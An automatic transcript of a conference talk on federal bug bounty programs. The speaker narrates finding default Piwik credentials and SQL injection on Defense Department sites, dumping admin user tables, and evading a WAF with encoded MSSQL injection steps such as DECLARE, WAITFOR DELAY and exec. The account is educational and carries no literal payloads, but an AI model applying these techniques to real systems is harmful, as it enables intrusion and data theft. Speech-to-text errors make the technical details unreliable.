Federal Bug Bounty Programs

[Music] so last minute addition we're going to talk a little bit about bug bounty programs specifically the federal bug bounty programs how to get paid out a disclaimer always right not the opinions of my current employer not here with their support even these defects are only representative samples that may or may not exist they may look like real defects but they have been modified slightly so they're not the actual defects some of this content is from memory some from my notes either which are very good anymore so please fetch check me I don't think I'm the smartest guy in the room call I'll make you one okay we are talking about the federal government please leave your political opinions

outside again aluminum foil deflector beanies not required and kool-aid not provided I did sign NDA's all kinds of agreements to do this so a lot of this stuff websites urls defects have been changed to protect the innocent namely me please do not try this at home and especially please do not try this at home without the express written consent of Major League Baseball right make sure you have permission for when you're doing this kind of stuff so what's the greatest thing about presenting that besides I get to talk about me right what the hell is a corpsman is the Marine Corps the hospital Corps is a corpsman okay just so we get that straight retired military is in the

military from 1999 to 98 I did comet combat trauma medicine and got my BSN just in training with the Marines ran with the Marines for quite a bit plugged a few sucking chest wounds and Marines that's all chest wounds don't suck but uh went to UVU when I got out transferred my BSN to be sses while I was there I met a Romanian immigrant named Dmitri now that's not our local Dmitri if you guys are new I know Dmitri wasn't him but uh we spiders started hanging out spent a lot of time together started doing a lot of stuff on security just on the side of we're going through school and he introduced me to this

group geeks that used to meet at the GCMs centers like once a month so that's how long I've been doing this just on the side in 1999 I started doing computers full-time I've been doing hardware and software development and testing for places like unisys and Intel and fidelity and EMC now Dell yeah and I actually started doing full time application security in 2014 where I switched from huy architecture to security to app set so some stuff on the side that I still do I do a lot of CTF still active member active parole of DC 801 and a lot of bug bounty programs so let's talk about the feds for a set the defense digital service August 11 2014

we established the United States digital service through a presidential executive order thanks Obama right it was supposed to be a tech startup within the federal government so you know it's under the executive branch the u.s. digital service and in the defense digital service and their mission is to apply best practices in technology and design to improve the usability and reliability of our government's most important digital services what that actually means is let's try and pull some of the government's Network out of the 70s and apply modern processes to it one of those being bug bounties right so in March they said we're going to have this whole hack the Pentagon program you can come in and hack the Pentagon they

announced it through hacker one's going to manage that for them the scope was anything defense gov plus the defense video network the Armed Forces Radio Network Armed Forces entertainment Network AFN and the defense imagery network which is kind of like the D vids but for just images later that year they announced hack the army which actually started in late November just 2016 and finished in late December just a couple of months ago scope was low army calm everything mobile army comm there's this sergeant star which is a like a virtual training sergeant that runs all across the Army's websites just a little javascript thing just like rinse the whole gamut of the girl name really

interesting but these program participants like myself were vetted through resumes and job applications if you were applying to an a planning to a job background checks and other methods by hacker one so whatever they had access to by working with the Department of Defense and if nothing else they learned these people that they were vetting they got analytics on them what are their tools what are their signatures what do they do how are they attacking us so that in itself could be useful right you know as an organization just looking at let people hack us and figure out what exactly they're attacking and how they're attacking it

okay we talked about low-hanging fruit in development right its timing check for me so first defect we're going to talk about is called low-hanging fruit okay this is one of those easy sauce stuff right so I used an intercepting proxy virtually Pro in this case I went in and I set the scope that was given to me for defense gov and turned on the scanner and the spider and turned off interception so I could actually just start browsing the site I browse the site through what looked like a normal user paths for about ten minutes and then turn that browser off went back into burp suite and said all right what are the tens of thousands of requests

that just happened sort those by response type response size everything you think about the individual requests that go to a website and get answered I see this one that's like that's supposed to be a request for favicon dot PNG now that's that little icon that shows up in your browser it should be like tiny little thing right there's a huge request for it well what the crap is that so I'm going to look at that in my browser again manually that does not look like favicon dot PNG right now when you see that on a defense gov website what's your first thought what have I just stepped into right so in actuality it was not a honeypot well

but side note what is a honeypot something that's set out there to something that's easy it's low-hanging fruit maybe it has some data that looks valid to keep you from you know blowing hitting the real stuff right so we'll leave that open for you no debate whether it was actually a honeypot or not so if we go back to that page what actually happened there so I'm analytics developer brand new guy probably left the backdoor in there disguised as favicon dot PNG so part of that we're going to watch what these hackers do we're going to go in we're going to track them we're going to see what their tools and their signatures are let's set up another analytics

program so we can see that even better but let's not secure it so what are the problems with that page there's just this page sitting out there with a login on it that we don't know is there we're not controlling it we don't have any analytics that give it about plaintext off right it was an HTTP age asking you to log in stop there wrote a book hey guys that's bad okay rod another one says oh by the way there's a password recovery there that's in plain text also that's bad so I start looking at that page little bit more there was a key on that page said Piwik oh alright next step Google what is Piwik now disclaimer here

nothing against Piwik it's an open source analytic software framework I'm not saying that they're bad or insecure I'm just saying that this was an out-of-the-box deployment of it and so not bad software bad DevOps when I start googling around Piwik find they're more than happy to give you the default users and passwords on their support site when you set up to ik stand it up right out of the box here's your admin and you here's your admin user and passport that going to work oh stop here hey guys this is really really bad ok so there's you know a couple of defects that I wrote against it already the documentation also said Oh out of

the box here's your my sequel cred alright so let's so a blind my sequel timing attack at it you know just just out of curiosity yeah positive for my sequel stopped here wrote a defect hey guys Michael you'll have MS sequel injection here so this is really really really bad now so about this time I get a response from the bug scrub it's just analytics this isn't the defense website that you're hitting is that this is an analytic site come on we can't pay out for attacking an analytic site can we so at this point I'm like huh come on gloves come off what kind of damage can you do with analytic data it's not

the actual site it's just metadata about the actual site right we track with agonal analytics who was there where they came from what they were doing how long they sat on each page who logged in [Music] so I start you know like I said I was kind of miffed at this point it's like no it's just Anna let it's just nothing real you know so I start pulling tables start pulling up the sequel map pulling out the big guns there Oh what here's the public users table and since we already had the user names default user names and passwords it wasn't hard to figure out that oh yeah these hashes they're sha-1 hashes and the salt yeah

it's just the user names so but once again you know that wasn't real consistent I started trying to guess new ones and it wasn't working out very well so you know as with any crypto technology more time more samples more success right from the three users that I had were just defaults there that that's what it looked like for real and oh by the way you so I thought anyways since that was unpredictable you know I couldn't really say you know this was actually the hashes II I start pulling a few more tables oh this one is another users type table it has the emails the usernames of the admins of the actual site so what are we tracking with

analytics who's logging in how often from where okay that's something we can work with that's the table that end up sending to them an email so stopped here updated the previous defects said all right if this isn't that big of an issue who is sergeant so-and-so at army mill looks like to do logged in here oh okay we agree that's bad I don't by the way you guys are stupid because you're not doing any egress filtering so there take that anyway that's that's the low-hanging fruit bug there's another one here we talked about who knows they're Dante or a pervert deception treachery the ninth circle of hell for Dante right this one I think you'll figure out why I called it that

tools used some simple online encoders and decoders along with 17 plus years of trial and error and instincts in testing software making software making hardware no automated tools or scanners or proxies would work because of the Web Application Firewall in place and the ids/ips that were in place so I I mean I did use Colo soft packet builder if you guys ever use that just to really verify the existence of the Web Application Firewall and the IDs and IPS doesn't really you know just getting the right tangs back making sure I'm getting the right packets back so but in all actuality this three week engagement about two to three hours every night and maybe 500 to

hundred requests every night manual request in my browser so just to give you an idea of just how long it took me to put this together now let's step back a little bit software test methodology run a test you get an expected result which is good an unexpected result which is bad and then sometimes you get a really flu bard way off out there right this is the expected result if you throw crap against the Army's website oh we can't answer that we don't know what that is okay this is unexpected you throw some crap against their website probably can't see that very well that's the server error 500 oh we don't like what you did kind of broke some stuff on

the inside we're not going to tell you anymore and then there's the really broken you don't have permission to do what you just asked me to do so go away all right so following that through manually with your request so I write a defect there's a sequel injection vulnerability in fake URL by inserting a no flash tag at base64-encoded href and then SMS sequel query logic error you're clearing the variable with a hexadecimal code the string get down to the MS execution layer at this point it's a matter of ethics I could use different encoding strings statements to find the scope of the users shoulder tables or upper tip so that was right out of the

defect write their initial response we don't we can't reproduce that from here but we're behind the firewall on the ideas so yeah we'll work with the honor comes back well it works on my machine okay when we run these requests at your signing next we get a 404 on everything we don't get to 500 we don't get the forbidden and finally fine if you have a sequel injection send us the sequel version we'll believe it we'll pay ya challenge accepted so reproduction steps part of the defect that I wrote on the fake URL there's an embedded flash video there's like a you know video FLV on their right they discreetly providing no flash solution so make this request we can read that

before I change your screen no sorry moving on all right here's the same request in plain English for a sake of brevity and time let's walk through it actually two different requests so start with the base URL base href right there has the embedded flash video in there dot no flash hey website I don't have flash can you display the following content without flash let me figure out that if you ask for that video manually you say hey give me this you give me this video in your URL in your browser it can't find it so it's not just out in some directory structure in the database so hey I don't have flash can you show me this video no

flash dot base64-encoded href that the flash is on that flash video is on all right so I don't have flash show me this without flash pull it out of the database basically then throw a URL encoded MMF sequel logic error at it you know that the standard my sequel MS sequel breakout right close what you're doing is start a new one now that we have a new sequel line I want to declare a bucket that bucket should have 200 of these things in it he's okay with that that had to be URL encoded by the way so did the next one my bucket is cue and should contain the following stuff this hex encoded ASCII wait for delay viewer

hours 0 minutes 10 seconds into my bucket when I execute that one I get an 11 plus second delay on the site all right we're onto something but if I actually say give me the unify stuff the hex encoded ASCII of that version in my bucket yeah now I get this just this claim by white page it says 12.2 dot five-thousand anybody know their MS sequel they're they're my sequel versions that's the current version of MS sequel and then after we send that in our scene we we populate what I bucket is we say alright execute my bucket so that's the one that's like I would do that no that's the one that took two to three

hours every night of just mashing with these strings to figure out how to get past the idea are the ideas how to get past the Web Application Firewall how to get access to that database where that flash video was being stored and so this is one that provided a big payout because it was a remote code injection I can sit outside and have you execute code so just returning that my sequel version string was what their test was right but what you really came for how can you get payouts from bug bounty programs right who's in QA already who sits in test software all day every day anyways right okay a lot of the stuff is

going to be seen familiar to you know how the software gets deployed so if you were working on this software if you were building and deploying this how would you do it that's a key be good at writing defects and doing it quickly talk about that so make your defects clear and concise you know short sweet absolutely upfront make them easy to read code and screenshots come afterwards as attachment so they can just go read it right through make your defects easy to understand don't assume they know what you're talking about don't assume they know the technology that you're working with home soon they even speak English and do it all quickly because you don't get paid out for

duplicates now testers instincts hackers instincts right you see not you've all seen those applications that just don't feel right you follow that bad smell right that's how you get that last one there's a bad smell in there if you put a no script in here something kind of funky comes through the application you follow that through and you start pushing it harder and harder and harder and then you find something out the other end so follow that bad smell use your instincts and critical thinking know when to stop either because you're toast it's one o'clock in the morning or because you're banging your head against a brick wall this isn't really going anywhere you got to a certain point and

then actually they've secured it now or because of ethics and scope don't cross that line you'll never be asked to come back right but also know when to push harder that's how you get paid out know when to push harder against the application and against the reviewer now these reviewers I may have painted them in the wrong light here they don't do this just to be me they do this to test your conviction to your bug how convinced are you that this is a problem and they're going to test that so be prepared to defend your defects know how to use those free and open source tools the hash cat burp suite sequel map know you know all those

tools in Kali holy crap but just know how to use the tools that you're going you know what at least one tool in your toolbox right one of each kind be non-destructive that users table and email was a hell of a lot farther than a crashed application dropped database and finally stay within the boundaries boundaries of your ethics and your scope they give you once again you'll be asked to not come back Thank You meta for this Danny if you're in the room thank you I guess I'm supposed to be the guy with the purple snuggly there but uh whatever I'm okay with it questions about federal bug bounty programs these hacks in particular I

think we've got about three or four minutes before Leslie comes and kicks me off the stage

I don't think they mean to be competitive the question is is if you have a reviewer or a bug scrub board that tends to be combative and you know I say you have to defend your defects how do you how do you prepare for that or how do you even preamp that and I guess the answer really is is be prepared to defend your bug in the first place when you write your bugs know what you're talking about and put it in a way that it's very clear and concise and give it good reproduction steps this is how I did it this is how you can do it now it was one here that they just said

we're behind the firewall so that's not going to work for us you just you know you just got to convince us but it's try not to think of it you know like I said they're really not trying to just be a dick about it they're they're just trying to protect their clients interests to make sure that this really is something that's as bad as you say it is and that they're not going to end up paying out on a bunch of just crap bugs that really aren't there so just be prepared to defend your bugs really and expect them to push back a little bit at least other questions no all right go ahead oh you know I didn't bring

pictures of them there on my Twitter I did put my Twitter up there earlier when you get a payout from these guys you also get coins will challenge coins a little you call it hacker street cred if you want but they're a pretty cool they're pretty nice those who are close to me you've seen him before probably you know I come in I pat myself on the back and brag about them almost daily right so more than anything I use them from my imposter syndrome this reminds me that yeah I am that guy okay

it's possible you know and you know like I said in order for me to actually get down and granted I was probably emotionally beyond that line at one time that where they said you know it's just analytics there's nothing wrong with that really right when I start and I dive down my thigh and you know sergeant so-and-so at army mill and you know give this list of ten actual people who log into there on an admin people that work in the Pentagon every day and they're logging into this application daily yeah but that's why they go through the hacker one in the first place that's why hacker one managed it for them if you do

step across that line if you do see something that you probably shouldn't have that's part of the NDA you know you don't you just you don't go talking about it you know talking about it but that's just part of the vetting process too so they want to make sure that if you do step over that line if you do see something you didn't see you're still at least a trustworthy semi trustworthy reputable person so they do have like I said pretty extensive NDA's and other agreements there so other questions all right thanks for your time today guys and thanks Rob for giving me your time for Roberts here in the room again thank you